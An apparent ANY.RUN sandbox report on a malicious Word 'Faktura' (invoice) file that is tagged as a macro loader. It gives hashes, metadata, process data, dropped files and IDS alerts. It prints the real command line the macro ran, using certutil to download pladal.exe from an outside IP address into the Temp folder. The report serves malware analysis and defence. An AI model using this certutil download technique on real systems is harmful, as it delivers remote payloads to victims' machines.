analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

O14_Faktura_000-032-6487-9931_19_06_F006_U1906161032529302699v.doc

Full analysis: https://app.any.run/tasks/4a945ef2-ba70-4e5e-93fe-6687f6b5c4ed
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 14, 2019, 08:56:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Oct 3 14:22:00 2019, Last Saved Time/Date: Thu Oct 3 14:23:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
MD5:

B20400DC6BDFBDBFF06413683A964465

SHA1:

AF809814E84F3009198DA3A2A7EF6F3F327FC752

SHA256:

20BB5DF4D1BED97B2E4EE9B2F9342156B6E68735408F5ADE9CAE2F00D532AAB5

SSDEEP:

192:wKHFxOlLZEvA+6/6rNavrgYjk+4bWlcdaZYcT6naIECb6YcBLA0jFwxrVtMg4Dwz:wk+8iSwvxjk+tcLIUeCOLA0jFAxtMjG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CertUtil for downloading files

      • WINWORD.EXE (PID: 2152)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2152)
    • Downloads executable files from IP

      • certutil.exe (PID: 2432)
    • Downloads executable files from the Internet

      • certutil.exe (PID: 2432)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • certutil.exe (PID: 2432)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2152)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2152)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Administrator
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: Administrator
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: 1.0 minutes
CreateDate: 2019:10:03 13:22:00
ModifyDate: 2019:10:03 13:23:00
Pages: 1
Words: -
Characters: -
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: -
Paragraphs: -
CharCountWithSpaces: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
2152"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\O14_Faktura_000-032-6487-9931_19_06_F006_U1906161032529302699v.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2432"C:\Windows\System32\certutil.exe" -urlcache -split -f http://104.244.75.179/pladal.exe C:\Users\admin\AppData\Local\Temp\pladal.exeC:\Windows\System32\certutil.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954402
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 454
Read events
926
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
1
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2152WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA718.tmp.cvr
MD5:
SHA256:
2152WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$4_Faktura_000-032-6487-9931_19_06_F006_U1906161032529302699v.docpgc
MD5:CC4C3BEEE10F90044E6E12262ACB53C0
SHA256:870841EF8932B6CED25B08F286E2CAEA5889063FD3F06EA5BFF186288095B54F
2432certutil.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8E89E2E47589ED3DDFAED62B41346F8Eexecutable
MD5:2764767A2D1A56BE8A9ECAD34BC887E8
SHA256:86521486374B5605DFBC8BDA25A68C9C2847FEDF5CA7B35E917DBDAC624074B4
2432certutil.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\pladal[1].exeexecutable
MD5:2AC7B8FED17BC7B7AFA19544B20694B4
SHA256:6886D08A19A55A4E4FFF3CBF2ABCF7D0EE513680B1EC0F74E3493CFC0569D232
2432certutil.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8E89E2E47589ED3DDFAED62B41346F8Ebinary
MD5:F789C425AF3F699AF8CB600E68D7C02A
SHA256:A18214568420C7BD0A26FA681C335C38CC90FAEA85C0F6517AC255B089CF8F9A
2152WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:E755D9D7A3DFBFCBDFE1CED66D92B911
SHA256:ABC564DDCD0E6D591C3CF4E0D82CDA84FFDB249CAEE68A97E737CB2A7178A8AB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2432
certutil.exe
GET
104.244.75.179:80
http://104.244.75.179/pladal.exe
US
malicious
2432
certutil.exe
GET
200
104.244.75.179:80
http://104.244.75.179/pladal.exe
US
executable
238 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2432
certutil.exe
104.244.75.179:80
FranTech Solutions
US
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
2432
certutil.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2432
certutil.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2432
certutil.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2432
certutil.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2432
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
2432
certutil.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2432
certutil.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2 ETPRO signatures available at the full report
No debug info